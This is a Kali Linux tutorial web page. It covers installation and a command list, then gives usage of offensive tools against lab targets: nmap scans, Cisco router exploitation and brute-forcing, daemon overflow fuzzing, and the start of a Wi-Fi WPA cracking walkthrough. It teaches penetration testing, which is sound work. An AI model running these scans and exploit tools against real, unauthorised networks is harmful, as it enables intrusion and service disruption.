Kali Linux Tutorial

Kali Linux is one of the best open-source security packages of an ethical hacker, containing a set of tools divided by categories. Kali Linux can be installed in a machine as an Operating System, which is discussed in this tutorial. Installing Kali Linux is a practical option as it provides more options to work and combine the tools.

This tutorial gives a complete understanding on Kali Linux and explains how to use it in practice.

Audience

This tutorial has been prepared for beginners to help them understand the fundamentals of Kali Linux. It will specifically be useful for penetration testing professionals. After completing this tutorial, you will find yourself at a moderate level of expertise from where you can take yourself to the next levels.

Prerequisites

Although this tutorial will benefit most of the beginners, it will definitely be a plus if you are familiar with the basic concepts of any Linux operating system.

Kali Linux is one of the best security packages of an ethical hacker, containing a set of tools divided by the categories. It is an open source and its official webpage is https://www.kali.org.

Generally, Kali Linux can be installed in a machine as an Operating System, as a virtual machine which we will discuss in the following section. Installing Kali Linux is a practical option as it provides more options to work and combine the tools. You can also create a live boot CD or USB. All this can be found in the following link: https://www.kali.org/downloads/

BackTrack was the old version of Kali Linux distribution. The latest release is Kali 2020.3 and it is updated very often.

Linux Distribution

To install Kali Linux −

Dual Boot Kali with Windows

Installing Kali alongside a Windows installation can be quite useful. However, you need to exercise caution during the setup process. First, make sure that you’ve backed up any important data on your Windows installation. Since you’ll be modifying your hard drive, you’ll want to store this backup on external media. Once you’ve completed the backup, we recommend you peruse Kali Linux Hard Disk Install, which explains the normal procedure for a basic Kali install.

In our example, we will be installing Kali Linux alongside an installation of Windows 7, which is currently taking up 100% of the disk space in our computer. We will start by resizing our current Windows partition to occupy less space and then proceed to install Kali Linux in the newly-created empty partition.

Installation Prerequisites

This guide will make the following assumptions:

We need to use a different image from the single boot Kali Linux install guide, as we need the live image. This is because we need to edit the disk structure without mounting any partitions, otherwise it would be in-use. After we have finished altering the disk, we can install Kali Linux with either:

  • The same live image, and after installation and the setup is complete, switch (or remove) the desktop environment, and/or change any metapackages.
  • Switch to the installer image (by using multiple CD/DVD/USBs or re-image on the same medium), and then continue the single boot guide as exactly as before

This installation has the potential to go wrong very easily as it involves editing existing partitions. Be aware of what partitions you are modifying and where you are installing Kali Linux to.
Having a backup of your Windows files available is a good idea in the event something goes wrong.

Resize Windows Procedure

  1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Boot screen. Select Live, and you should be booted into the Kali Linux default desktop.
  2. Now launch the gparted program. We’ll use gparted to shrink the existing Windows partition to give us enough room to install Kali Linux.

dual-boot-kali-013. Select your Windows partition (/dev/sda2) & resize it leaving enough space (we recommend at least 20 GB) for the Kali Linux installation.

Depending on your setup, it is often the second, larger partition. In our example, there are three partitions:

  • Window’s boot partition (/dev/sda1)
  • Window’s main operating system itself (/dev/sda2)
  • Window’s System Recovery partition (/dev/sda3)

If you are moving past into any non-white in the partition then you are editing a section that is in use.
Only remove from the area of the partition that is not in use.
It is alright to leave the third partition (/dev/sda3), and only shrink the actual install (/dev/sda2).

If you wish to organize the partition to group all the Windows partitions together, placing the free space at the end, you may do so.

before-resize4. Once you have resized your Windows partition, ensure you “Apply All Operations” on the hard disk. Exit gparted and reboot.

after-resize

Kali Linux Installation Procedure

  1. The installation procedure from this point onwards is similar to a Kali Linux Hard Disk install, until the point of the partitioning, where you need to select “Guided – use the largest continuous free space” that you created earlier with gparted.

dual-boot-kali-092. Once the installation is done, reboot. You should be greeted with a GRUB boot menu, which will allow you to boot either into Kali Linux or Windows.

dual-boot-kali-11

Post Installation

Now that you’ve completed installing Kali Linux, it’s time to customize your system.

The General Use section has more information and you can also find tips on how to get the most out of Kali in our User Forums.

One thing that may be worth knowing about is that occasionally the time will get changed between the Windows and the Linux system. To fix this, we can do the following:

kali@kali:~$ timedatectl set-local-rtc 1 --adjust-system-clock
kali@kali:~$

To undo this we can simply do:

kali@kali:~$ timedatectl set-local-rtc 0 --adjust-system-clock
kali@kali:~$
  • First, we will download the Virtual box and install it.
  • Later, we will download and install Kali Linux distribution.

Download and Install the Virtual Box

A Virtual Box is particularly useful when you want to test something on Kali Linux that you are unsure of. Running Kali Linux on a Virtual Box is safe when you want to experiment with unknown packages or when you want to test a code.

With the help of a Virtual Box, you can install Kali Linux on your system (not directly in your hard disk) alongside your primary OS which can MAC or Windows or another flavor of Linux.

Let’s understand how you can download and install the Virtual Box on your system.

Step 1 − To download, go to https://www.virtualbox.org/wiki/Downloads. Depending on your operating system, select the right package. In this case, it will be the first one for Windows as shown in the following screenshot.

Virtual Box First Page
virtual box instalation

Step 2 − Click Next.

SetUp
Virtual box setup

Step 3 − The next page will give you options to choose the location where you want to install the application. In this case, let us leave it as default and click Next.

Custom Setup
select feature

Step 4 − Click Next and the following Custom Setup screenshot pops up. Select the features you want to be installed and click Next.

Custom Features
Oracle Vm Custom setup

Step 5 − Click Yes to proceed with the installation.

Network Interface
Network interface

Step 6 − The Ready to Install screen pops up. Click Install.

Ready to install
Oracle virtualBox ready to instlal

Step 7 − Click the Finish button.

Complete Installation
Oracle vm setup complete

The Virtual Box application will now open as shown in the following screenshot. Now we are ready to install the rest of the hosts for this manual and this is also recommended for professional usage.

Virtual Manager
welcome to Virtualbox

Install Kali Linux

Now that we have successfully installed the Virtual Box, let’s move on to the next step and install Kali Linux.

Step 1 − Download the Kali Linux package from its official website: https://www.kali.org/downloads/

Offensive Security
kali linux image

Step 2 − Click VirtualBox → New as shown in the following screenshot.

Machine New
Creat a kali image in Virtualbox

Step 3 − Choose the right virtual hard disk file and click Open.

Hard Disk File
Vitual hard disk file

Step 4 − The following screenshot pops up. Click the Create button.

Create
Gave memory

Step 5 − Start Kali OS. The default username is root and the password is toor.

Kali OS
Kali booted

Dual Boot Kali on Mac Hardware

IMPORTANT! Some newer Macs do not run Linux well, or at all. Please look into if your Mac can use Linux before attempting.

Kali Linux Installation Requirements

Since the release of Kali Linux 1.0.8, Kali Linux supports EFI out of the box. This added feature simplifies the process of getting Kali installed and running on various Apple MacBook Air, Pro, and Retina models.

The make/model/year of the device will determine how successful your experience will be, with newer devices having a better chance of working. Pre-installing rEFInd may also increase the odds of success on older devices.

This guide will show you to dual-boot OSX with Kali Linux using rEFInd, with the option of encrypting the Kali Linux partition. If you wish to replace OSX completely, please refer to our Single Boot Kali on Mac Hardware guide.

By using using the 3rd party software rEFInd (a fork of rEFIt) we are able to open up the boot menu used in Apple’s OSX OS, which is perfect for dual booting. It also has the advantage of helping older devices boot from USB that would not be able to otherwise. Once Kali Linux has been installed, rEFInd can be customized to be hidden or removed completely.

Installation Prerequisites

  • A minimum of 20 GB disk space for the Kali Linux install.
  • A minimum of 1 GB RAM. 2 GB or more recommended.
  • Devices older than ‘late 2012’, may require a blank DVD. USB booting may not work without rEFInd pre-installed.
  • For devices newer than ‘late 2012’, you’ll need a blank DVD or a USB drive.
  • OSX 10.7 or higher

Preparing for the Installation

  1. Download Kali Linux.
  2. Burn the Kali Linux ISO image to a DVD or copy the image to USB drive.
  3. Backup any important information on the device to external media.

Preparing OSX (Installing rEFInd)

  1. At the time of this writing, the latest version of rEFInd is 0.8.3. Boot into OSX and download a local copy.
osx:~ mbp$ curl -s -L http://sourceforge.net/projects/refind/files/0.8.3/refind-bin-0.8.3.zip -o refind.zip
  1. After downloading rEFInd, extract the contents of the zip file and run the install shell script with sudo.
osx:~ mbp$ unzip -q refind.zip
osx:~ mbp$ cd refind-bin-*/
osx:refind-bin-0.8.3 mbp$ sudo bash install.sh

WARNING: Improper use of the sudo command could lead to data loss
or the deletion of important system files. Please double-check your
typing when using sudo. Type "man sudo" for more information.

To proceed, enter your password, or type Ctrl-C to abort.

Password:
Installing rEFInd on OS X....
Installing rEFInd to the partition mounted at //
Copied rEFInd binary files

Copying sample configuration file as refind.conf; edit this file to configure
rEFInd.

WARNING: If you have an Advanced Format disk, *DO NOT* attempt to check the
bless status with 'bless --info', since this is known to cause disk corruption
on some systems!!

Installation has completed successfully.

osx:refind-bin-0.8.3 mbp$

Kali Linux Partitioning Procedure

  1. Before we can install Kali Linux, there needs to be room on the hard disk. By booting into a live Kali session, we can resize the partition to our desired size. To do so, power on the device and immediately press and hold the Option key until you see the rEFInd boot menu.

01-rEFInd2. When the boot menu appears, insert your chosen installation medium. If everything works as expected, you will see two volumes:

  • EFI – EFI\BOOT\syslinux.efi from 61 MiB FAT volume
  • Windows – Legacy OS from FAT volume

Although Kali Linux is based on Debian, Apple/rEFInd detects it as Windows. Select the Windows volume to continue.

  • If you are using a DVD, you may need to refresh the menu by pressing ESC once the disk if fully spinning.
  • If you still only see one volume (EFI), then the installation medium is not supported for your Apple device. If you haven’t already done so, you may wish to install rEFInd and try again.
  • If you select the EFI volume, the booting will hang at this point and you will not be able to continue.

02-rEFInd_boot3. You should be greeted with the Kali Boot screen. Select Live and you should be booted into the Kali Linux default desktop.

03-live-boot-menu4. We can use GParted to shrink the existing OSX partition (HFS+), allowing us to install Kali in the free space. You can find GParted in the Kali menu by navigating to: Applications -> System Tools -> GParted Partition Editor

04-gparted_menu5. Once GParted has opened, select your OSX partition. Depending on your system, it will usually be the second, larger partition. In our example, there are three partitions: the EFI upgrade partition (/dev/sda1), OSX (/dev/sda2), and System Recovery (/dev/sda3). Resize your OSX partition and leave enough space (20 GB minimum) for the Kali installation.

05-gparted_resize

Kali Linux Installation Procedure

  1. To start the Kali Linux installation, repeat steps 1 and 2 above to boot to the Kali Linux boot screen. Once you can see the the boot screen, choose ‘Live’, ‘Graphical Install’ or ‘(Text-Mode) Install’ to begin the setup. In this guide, we chose ‘Graphical Install’.

03-boot-menu2. Select your preferred language and then your country location. You’ll also be prompted to configure your keyboard with the appropriate keymap.

05-lanuage3. The installer will copy the image to your hard disk, probe your network interfaces, and then prompt you to enter a hostname then domain name for your system. In the example below, we’ve entered ‘kali’ as our hostname.

  • If the setup detected multiple NICs, it may prompt you which one to use for installation.
  • If the chosen NIC is 802.11 based, it will ask for wireless network information to collect, before prompting for a hostname.
  • If there isn’t a DHCP service running on the network, it will ask you to manually enter the network information after probing for network interfaces.
  • If Kali Linux doesn’t detect your NIC, you either need to include the drivers for it when prompted, or generate a custom Kali Linux ISO with them pre-included.

06-hostname4. Enter a robust password for the root account.

07-root-password5. Next, set your time zone.

08-time-date6. The installer will now probe your disks and offer you five choices. In our example, we’re using the spare partition that we made during live mode, so we select ‘Guided – use the largest continuous free space’.

  • Experienced users can use the ‘Manual’ option for more granular configuration options. This option will also allow you to set up encrypted LVM, so Kali Linux would be fully encrypted. The screen afterwards will prompt you for the password. You will have to enter the same password every time you start up Kali Linux.

Kali will automatically securely wipe the hard disk before asking for the password. This may take ‘a while’ (hours) depending on size and speed of the drive. If you wish to risk it, you can skip it.

12-partition7. The next stage is to select the partition structure you want to use. We will go ahead and use the default option and have everything on one partition. Afterwards it will display an overview. If you agree to what it suggests, press the continue button.

14_structure8. Next, you’ll have one last chance to review your disk configuration before the installer makes irreversible changes. After you click Continue, the installer will go to work and you’ll have an almost finished installation.

15_check9. This screen configures the use of our Internet network mirrors. Kali can use our online central repository to distribute applications to keep packages up-to-date and allow for additional programs to be installed more easily. Should you need to enter any appropriate proxy information, the next screen will allow you to enter the required details.

If you select ‘NO’ in this screen, you will NOT be able to install packages from Kali repositories until you alter your sources.

13-package-manager10. Next, install GRUB bootloader.

14-grub11. Finally, click ‘Continue’ to finish installing Kali Linux. It is highly recommend that you restart your machine at this stage. Once complete, repeat the first 2 steps again to boot into ‘Live mode’ once more.

15-finish12. If the gdisk package isn’t included in your Kali Linux ISO, you will first need to install it. If you enabled the network repository during the setup, this can easily be done:

apt update
apt install -y gdisk
  1. We are now going to convert the Master Boot Record (MBR) to a hybrid, which will allow for Apple’s EFI to detect and boot using GRUB. Once complete, power off the device and remove any installation media when prompted.
root@kali:~# gdisk /dev/sda
GPT fdisk (gdisk) version 0.8.5

Partition table scan:
MBR: protective
BSD: not present
APM: not present
GPT: present

Found valid GPT with protective MBR; using GPT.

Command (? for help): p
Disk /dev/sda: 976773168 sectors, 465.8 GiB
Logical sector size: 512 bytes
Disk identifier (GUID): 1B3DB3D4-ECFD-47A1-9435-F2FF318C2F55
Partition table holds up to 128 entries
First usable sector is 34, last usable sector is 976773134
Partitions will be aligned on 8-sector boundaries
Total free space is 245 sectors (122.5 KiB)

Number Start (sector) End (sector) Size Code Name
1 40 409639 200.0 MiB EF00 EFI System Partition
2 409640 548413439 261.3 GiB AF00 Macintosh
3 975503592 976773127 619.9 MiB AB00 Recovery HD
4 548413440 548415487 1024.0 KiB EF02
5 548415488 958138367 195.4 GiB 0700
6 958138368 975503359 8.3 GiB 8200

Command (? for help): r

Recovery/transformation command (? for help): h

WARNING! Hybrid MBRs are flaky and dangerous! If you decide not to use one,
just hit the Enter key at the below prompt and your MBR partition table will
be untouched.

Type from one to three GPT partition numbers, separated by spaces, to be
added to the hybrid MBR, in sequence: 5
Place EFI GPT (0xEE) partition first in MBR (good for GRUB)? (Y/N): y

Creating entry for GPT partition #5 (MBR partition #2)
Enter an MBR hex code (default 07): 83
Set the bootable flag? (Y/N): y

Unused partition space(s) found. Use one to protect more partitions? (Y/N): n

Recovery/transformation command (? for help): w

Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!

Do you want to proceed? (Y/N): y
OK; writing new GUID partition table (GPT) to /dev/sda.
The operation has completed successfully.
root@kali:~#
  1. At this stage, we are able to use both Kali Linux and OSX and select which one we want to use at start up.
20-refind

rEFInd Configuration

If you wish, you can alter rEFInd in various ways now, including:

  • The default OS selection (by default it is OSX)
  • Timeout value (by default it is 20 seconds)
  • Direct boot into the default OS (Note, by pressing Options during boot, you will have a one time boot menu)
  • Remove rEFInd, enabling the use of the traditional Apple menu (booting to OSX and Kali Linux will still work)

If you wish to make any of these alterations, boot into OSX, and alter the following file:

osx:~ mbp$ sudo nano /EFI/refind/refind.conf
  • The timeout value controls how long you have to select an OS from the boot menu. By setting it to ‘-1’, it will boot directly into the default OS.
21-refind_timeout
  • The ‘default_selection’ value sets the default selection on startup. OSX will be at position ‘1’ and Kali will be at ‘2’. In this example, we will use OSX as the default.
22-refind_default
  • If we combine the two alterations and save our changes, the next time we reboot, it will appear that nothing has changed from before installing Kali Linux. However, if we hold down the ‘Options’ key for the Apple boot menu, we will see the following:
    • EFI Boot – OSX
    • Windows – Kali Linux
    • Recovery HD – OSX’s Recovery Partition
23-done

Using Apple’s boot menu, the value names cannot be altered. If you wish to customize these values, you will need to use rEFInd.

Try again Convert to link

https://3.108.56.168

Important A-Z kali linux Commands–

Kali Linux commandsFunction
A
 apropos Search Help manual pages (man -k)
 apt-get Search for and install software packages (Debian)
 aptitude Search for and install software packages (Debian)
 aspell Spell Checker
 awk Find and Replace text, database sort/validate/index
B
 basename Strip directory and suffix from filenames
 bash GNU Bourne-Again Shell
 bc Arbitrary precision calculator language
 bg Send to background
 break Exit from a loop
 builtin Run a shell builtin
 bzip2 Compress or decompress named files
C
 cal Display a calendar
 case Conditionally perform a command
 cat Concatenate and print (display) the content of files
 cd Change Directory
 cfdisk Partition table manipulator for Linux
 chgrp Change group ownership
 chmod Change access permissions
 chown Change file owner and group
 chroot Run a command with a different root directory
 chkconfig System services (runlevel)
 cksum Print CRC checksum and byte counts
 clear Clear terminal screen
 cmp Compare two files
 comm Compare two sorted files line by line
 command Run a command – ignoring shell functions
 continue Resume the next iteration of a loop
 cp Copy one or more files to another location
 cron Daemon to execute scheduled commands
 crontab Schedule a command to run at a later time
 csplit Split a file into context-determined pieces
 cut Divide a file into several parts
D
 date Display or change the date and time
 dc Desk Calculator
 dd Convert and copy a file, write disk headers, boot records
 ddrescue Data recovery tool
 declare Declare variables and give them attributes
 df Display free disk space
 diff Display the differences between two files
 diff3 Show differences among three files
 dig DNS lookup
 dir Briefly list directory contents
 dircolors Colour setup for `ls’
 dirname Convert a full pathname to just a path
 dirs Display list of remembered directories
 dmesg Print kernel & driver messages
 du Estimate file space usage
E
 echo Display message on screen
 egrep Search files for lines that match an extended expression
 eject Eject removable media
 enable Enable and disable builtin shell commands
 env Environment variables
 ethtool Ethernet card settings
 eval Evaluate several commands/arguments
 exec Execute a command
 exit Exit the shell
 expect Automate arbitrary applications accessed over a terminal
 expand Convert tabs to spaces
 export Set an environment variable
 expr Evaluate expressions
F
 false Do nothing, unsuccessfully
 fdformat Low-level format a floppy disk
 fdisk Partition table manipulator for Linux
 fg Send job to foreground
 fgrep Search files for lines that match a fixed string
 file Determine file type
 find Search for files that meet a desired criteria
 fmt Reformat paragraph text
 fold Wrap text to fit a specified width
 for Expand words, and execute commands
 format Format disks or tapes
 free Display memory usage
 fsck File system consistency check and repair
 ftp File Transfer Protocol
 function Define Function Macros
 fuser Identify/kill the process that is accessing a file
G
 gawk Find and Replace text within files
 getopts Parse positional parameters
 grep Search files for lines that match a given pattern
 groupadd Add a user security group
 groupdel Delete a group
 groupmod Modify a group
 groups Print group names a user is in
 gzip Compress or decompress named files
H
 hash Remember the full pathname of a name argument
 head Output the first part of files
 help Display help for a built-in command
 history Command History
 hostname Print or set system name
I
 iconv Convert the character set of a file
 id Print user and group id’s
 if Conditionally perform a command
 ifconfig Configure a network interface
 ifdown Stop a network interface
 ifup Start a network interface up
 import Capture an X server screen and save the image to file
 install Copy files and set attributes
J
 jobs List active jobs
 join Join lines on a common field
K
 kill Stop a process from running
 killall Kill processes by name
L
 less Display output one screen at a time
 let Perform arithmetic on shell variables
 ln Create a symbolic link to a file
 local Create variables
locate Find files
 logname Print current login name
 logout Exit a login shell
 look Display lines beginning with a given string
 lpc Line printer control program
 lpr Off line print
 lprint Print a file
 lprintd Abort a print job
 lprintq List the print queue
 lprm Remove jobs from the print queue
 ls List information about files
 lsof List open files
M
 make Recompile a group of programs
 man Help manual
 mkdir Create new folders
 mkfifo Make FIFOs (named pipes)
 mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
 mknod Make block or character special files
 more Display output one screen at a time
 mount Mount a file system
 mtools Manipulate MS-DOS files
 mtr Network diagnostics (traceroute/ping)
 mv Move or rename files or directories
 mmv Mass Move and rename files
N
 netstat Networking information
 nice Set the priority of a command or job
 nl Number lines and write files
 nohup Run a command immune to hangups
 notify-send Send desktop notifications
 nslookup Query Internet name servers interactively
O
 open Open a file in its default application
 op Operator access
P
 passwd Modify a user password
 paste Merge lines of files
 pathchk Check file name portability
 ping Test a network connection
 pkill Stop processes from running
 popd Restore the previous value of the current directory
 pr Prepare files for printing
 printcap Printer capability database
 printenv Print environment variables
 printf Format and print data
 ps Process status
 pushd Save and then change the current directory
 pwd Print Working Directory
Q
 quota Display disk usage and limits
 quotacheck Scan a file system for disk usage
 quotactl Set disk quotas
R
 ram ram disk device
 rcp Copy files between two machines
 read Read a line from standard input
 readarray Read from stdin into an array variable
 readonly Mark variables/functions as readonly
 reboot Reboot the system
 rename Rename files
 renice Alter priority of running processes
 remsync Synchronize remote files via email
 return Exit a shell function
 rev Reverse lines of a file
 rm Remove files
 rmdir Remove folders
 rsync Remote file copy (Synchronize file trees)
S
 screen Multiplex terminal, run remote shells via ssh
 scp Secure copy (remote file copy)
 sdiff Merge two files interactively
 sed Stream Editor
 select Accept keyboard input
 seq Print numeric sequences
 set Manipulate shell variables and functions
 sftp Secure File Transfer Program
 shift Shift positional parameters
 shopt Shell Options
 shutdown Shutdown or restart linux
 sleep Delay for a specified time
 slocate Find files
 sort Sort text files
 source Run commands from a file
 split Split a file into fixed-size pieces
 ssh Secure Shell client (remote login program)
 strace Trace system calls and signals
 su Substitute user identity
 sudo Execute a command as another user
 sum Print a checksum for a file
 suspend Suspend execution of this shell
 symlink Make a new name for a file
 sync Synchronize data on disk with memory
T
 tail Output the last part of file
 tar Tape Archiver
 tee Redirect output to multiple files
 test Evaluate a conditional expression
 time Measure Program running time
 times User and system times
 touch Change file timestamps
 top List processes running on the system
 traceroute Trace Route to Host
 trap Run a command when a signal is set(bourne)
 tr Translate, squeeze, and/or delete characters
 true Do nothing, successfully
 tsort Topological sort
 tty Print filename of terminal on stdin
 type Describe a command
U
 ulimit Limit user resources
 umask Users file creation mask
 umount Unmount a device
 unalias Remove an alias
 uname Print system information
 unexpand Convert spaces to tabs
 uniq Uniquify files
 units Convert units from one scale to another
 unset Remove variable or function names
 unshar Unpack shell archive scripts
 until Execute commands (until error)
 uptime Show uptime
 useradd Create new user account
 usermod Modify user account
 users List users currently logged in
 uuencode Encode a binary file
 uudecode Decode a file created by uuencode
V
 v Verbosely list directory contents (`ls -l -b’)
 vdir Verbosely list directory contents (`ls -l -b’)
 vi Text Editor
 vmstat Report virtual memory statistics
W
 wait Wait for a process to complete
 watch Execute/display a program periodically
 wc Print byte, word, and line counts
 whereis Search the user’s $path, man pages and source files for a program
 which Search the user’s $path for a program file
 while Execute commands
 who Print all usernames currently logged in
 whoami Print the current user id and name (`id -un’)
 wget Retrieve web pages or files via HTTP, HTTPS or FTP
 write Send a message to another user
X
 xargs Execute utility, passing constructed argument lists
 xdg-open Open a file or URL in the user’s preferred application

Update Kali

It is important to keep updating Kali Linux and its tools to the new versions, to remain functional. Following are the steps to update Kali.

Step 1 − Go to Application → Terminal. Then, type “apt-get update” and the update will take place as shown in the following screenshot.

Application
Update kali
Terminal
Open terminal

Step 2 − Now to upgrade the tools, type “apt-get upgrade” and the new packages will be downloaded.

Upgrade
Updating

Step 3 − It will ask if you want to continue. Type “Y” and “Enter”.

Enter Y
type y to Continue

Step 4 − To upgrade to a newer version of Operating System, type “apt-get dist upgrade”.

Dist Upgrade
apt-get dist update

Laboratory Setup

In this section, we will set up another testing machine to perform the tests with the help of tools of Kali Linux.

Step 1 − Download Metasploitable, which is a Linux machine. It can be downloaded from the official webpage of Rapid7https://information.rapid7.com/metasploitabledownload.html?LS=1631875&CS=web

Metasploitable

Step 2 − Register by supplying your details. After filling the above form, we can download the software.

Registering
rapid 7

Step 3 − Click VirtualBox → New.

Machine New
Virtual disk manager

Step 4 − Click “Use an existing virtual hard disk file”. Browse the file where you have downloaded Metasploitable and click Open.

Existing Hard Disk

Step 5 − A screen to create a virtual machine pops up. Click “Create”.

Machine Popups
Select Main memory size

The default username is msfadmin and the password is msfadmin.

Login Details
matasploitable

In this chapter, we will discuss the information gathering tools of Kali Linux.

NMAP and ZenMAP

NMAP and ZenMAP are useful tools for the scanning phase of Ethical Hacking in Kali Linux. NMAP and ZenMAP are practically the same tool, however NMAP uses command line while ZenMAP has a GUI.

NMAP is a free utility tool for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

NMAP uses raw IP packets in novel ways to determine which hosts are available on the network, what services (application name and version) those hosts are offering, which operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, etc.

Now, let’s go step by step and learn how to use NMAP and ZenMAP.

Step 1 − To open, go to Applications → 01-Information Gathering → nmap or zenmap.

Nmap ZenMap

Step 2 − The next step is to detect the OS type/version of the target host. Based on the help indicated by NMAP, the parameter of OS type/version detection is variable “-O”. For more information, use this link: https://nmap.org/book/man-os-detection.html

The command that we will use is −

nmap -O 192.168.1.101

The following screenshot shows where you need to type the above command to see the Nmap output −

Nmap Output
TCP UDP port

Step 3 − Next, open the TCP and UDP ports. To scan all the TCP ports based on NMAP, use the following command −

nmap -p 1-65535 -T4  192.168.1.101 

Where the parameter “–p” indicates all the TCP ports that have to be scanned. In this case, we are scanning all the ports and “-T4” is the speed of scanning at which NMAP has to run.

Following are the results. In green are all the TCP open ports and in red are all the closed ports. However, NMAP does not show as the list is too long.

Closed Ports

Stealth Scan

Stealth scan or SYN is also known as half-open scan, as it doesn’t complete the TCP three-way handshake. A hacker sends a SYN packet to the target; if a SYN/ACK frame is received back, then it’s assumed the target would complete the connect and the port is listening. If an RST is received back from the target, then it is assumed the port isn’t active or is closed.

Half Open Scan
Syn Packet

Now to see the SYN scan in practice, use the parameter –sS in NMAP. Following is the full command −

nmap -sS -T4 192.168.1.101 

The following screenshot shows how to use this command −

ZenMap Command

Searchsploit

Searchsploit is a tool that helps Kali Linux users to directly search with the command line from Exploit database archive.

To open it, go to Applications → 08-Exploitation Tools → searchsploit, as shown in the following screenshot.

Searchsploit
searchsploit

After opening the terminal, type “searchsploit exploit index name“.

Exploit Index Name
Searchsploit Windows

DNS Tools

In this section, we will learn how to use some DNS tools that Kali has incorporated. Basically, these tools help in zone transfers or domain IP resolving issues.

dnsenum.pl

The first tool is dnsenum.pl which is a PERL script that helps to get MX, A, and other records connect to a domain.

Click the terminal on the left panel.

Terminal Left Panel
dnsenum

Type “dnsenum domain name” and all the records will be shown. In this case, it shows A records.

Domain Name
Dnsenum

DNSMAP

The second tool is DNSMAP which helps to find the phone numbers, contacts, and other subdomain connected to this domain, that we are searching. Following is an example.

Click the terminal as in the upper section , then write “dnsmap domain name”

DNS Map
using dnsmap

dnstracer

The third tool is dnstracer, which determines where a given Domain Name Server (DNS) gets its information from for a given hostname.

Click the terminal as in the upper section, then type “dnstracer domain name”.

DnsTracer
Using DNS tracer

LBD Tools

LBD (Load Balancing Detector) tools are very interesting as they detect if a given domain uses DNS and/or HTTP load balancing. It is important because if you have two servers, one or the other may not be updated and you can try to exploit it. Following are the steps to use it −

First, click the terminal on the left panel.

Terminal Left Panel
dnsenum

Then, type “lbd domainname”. If it produces a result as “FOUND”, it means that the server has a load balance. In this case, the result is “NOT FOUND”.

LBD Domain Name
lbd

Hping3

Hping3 is widely used by ethical hackers. It is nearly similar to ping tools but is more advanced, as it can bypass the firewall filter and use TCP, UDP, ICMP and RAW-IP protocols. It has a traceroute mode and the ability to send files between a covered channel.

Click the terminal on the left panel.

Terminal Left Panel

Type “hping3 –h” which will show how to use this command.

Hping3

The other command is “hping3 domain or IP -parameter”

IP Parameter
hping3

In this chapter, we will learn how to use some of the tools that help us exploit devices or applications in order to gain access.

Cisco Tools

Kali has some tools that can be used to exploit Cisco router. One such tool is Cisco-torch which is used for mass scanning, fingerprinting, and exploitation.

Let’s open the Terminal console by clicking the left pane.

Terminal Left Panel

Then, type “cisco-torch –parameter IP of host” and if there is nothing found to exploit, then the following result will be shown.

Cisco Torch

To see what are the parameters that can be used, type “cisco-torch ?”

Cisco Parameter

Cisco Auditing Tool

It is a PERL script, which scans Cisco routers for common vulnerabilities. To use it, again open the terminal on the left pane as shown in the previous section and type “CAT –h hostname or IP”.

You can add the port parameter “-p” as shown in the following screenshot, which in this case is 23 to brute-force it.

Port Parameter

Cisco Global Exploiter

Cisco Global Exploiter (CGE) is an advanced, simple, and fast security testing tool. With these tools, you can perform several types of attacks as shown in the following screenshot. However, be careful while testing in a live environment as some of them can crash the Cisco devise. For example, option Option can stop the services.

Cisco Device

To use this tool, type “cge.pl IPaddress number of vulnerability”

The following screenshot shows the result of the test performed on Cisco router for the vulnerability number 3 from the list above. The result shows the vulnerability was successfully exploited.

Cisco Router

BED

BED is a program designed to check daemons for potential buffer overflows, format strings, et. al.

Check Daemons

In this case, we will test the testing machine with IP 192.168.1.102 and the protocol HTTP.

The command will be “bed –s HTTP –t 192.168.1.102” and testing will continue.

wiFi Cracking with aircrack-ng

Testing

In this chapter, we will learn how to use Wi-Fi cracking tools that Kali Linux has incorporated. However, it is important that the wireless card that you has a support monitoring mode.

Step 1 – Start the wireless interface in monitor mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally deauthenticate a wireless client in a later step.

The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command:

 airmon-ng

On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds:

 Interface       Chipset         Driver
 
 rausb0          Ralink RT73     rt73
 wlan0           Broadcom        b43 - [phy0]
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0)

The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won’t work with v0.9.1. Both entries of the Atheros card show “madwifi-ng” as the driver – follow the madwifi-ng-specific steps to set up the Atheros card. Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver – see the generic instructions for setting it up.

Step 1a – Setting up madwifi-ng

First stop ath0 by entering:

 airmon-ng stop ath0   

The system responds:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter “iwconfig” to ensure there are no other athX interfaces. It should look similar to this:

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run “iwconfig” to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

 airmon-ng start wifi0 9

Note: In this command we use “wifi0” instead of our wireless interface of “ath0”. This is because the madwifi-ng drivers are being used.

The system will respond:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that “ath0” is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter “iwconfig”.

The system will respond:

 lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

